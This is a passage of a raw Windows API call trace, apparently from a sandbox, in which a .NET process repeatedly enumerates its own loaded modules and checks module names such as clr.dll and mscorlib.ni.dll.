GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.915] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.915] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.916] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.916] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.916] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.917] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.917] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.918] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.918] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.919] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.919] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.919] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.920] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.920] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.921] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.921] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.922] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.923] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.923] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.924] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0216.924] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0216.925] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x18ea28, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0216.926] StrStrIW (lpFirst="C:\\Windows\\system32\\combase.dll", lpSrch="\\system.ni.dll") returned 0x0 [0217.331] GetCurrentProcess () returned 0xffffffff [0217.331] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18cd08, cb=0x1000, lpcbNeeded=0x18df1c | out: lphModule=0x18cd08, lpcbNeeded=0x18df1c) returned 1 [0217.331] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0217.331] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0217.332] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0217.332] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0217.332] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0217.332] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0217.332] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0217.332] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0217.332] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0217.333] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0217.333] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0217.333] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0217.333] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0217.334] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0217.334] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0217.334] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0217.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0217.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0217.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0217.336] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0217.336] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0217.336] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0217.337] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0217.337] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0217.338] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0217.338] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0217.339] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0217.339] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0217.340] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0217.340] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0217.341] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0217.341] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0217.342] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0217.343] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0217.343] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x18df10, cb=0xc | out: lpmodinfo=0x18df10*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0217.344] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x18dd08, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0217.593] StrStrIW (lpFirst="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll", lpSrch="\\system.ni.dll") returned 0x0 [0217.641] GetCurrentProcess () returned 0xffffffff [0217.641] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18dca8, cb=0x1000, lpcbNeeded=0x18eebc | out: lphModule=0x18dca8, lpcbNeeded=0x18eebc) returned 1 [0217.641] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0217.641] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0217.642] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0217.642] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0217.642] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0217.642] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0217.642] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0217.642] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0217.642] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0217.643] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0217.643] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0217.643] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0217.643] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0217.644] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0217.644] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0217.644] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0217.645] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0217.645] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0217.645] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0217.646] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0217.646] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0217.646] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0217.647] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0217.647] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0217.648] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0217.648] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0217.649] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0217.649] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0217.650] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0217.650] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0217.651] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0217.651] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0217.652] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0217.652] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0217.653] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x18eeb0, cb=0xc | out: lpmodinfo=0x18eeb0*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0217.654] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x18eca8, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0217.657] GetCurrentProcess () returned 0xffffffff [0217.657] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d7b4, cb=0x1000, lpcbNeeded=0x18e9c8 | out: lphModule=0x18d7b4, lpcbNeeded=0x18e9c8) returned 1 [0217.657] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0217.657] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0217.657] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0217.658] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0217.658] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0217.658] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0217.658] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0217.658] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0217.658] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0217.659] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0217.659] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0217.659] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0217.659] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0217.660] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0217.660] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0217.660] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0217.661] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x775e0000, 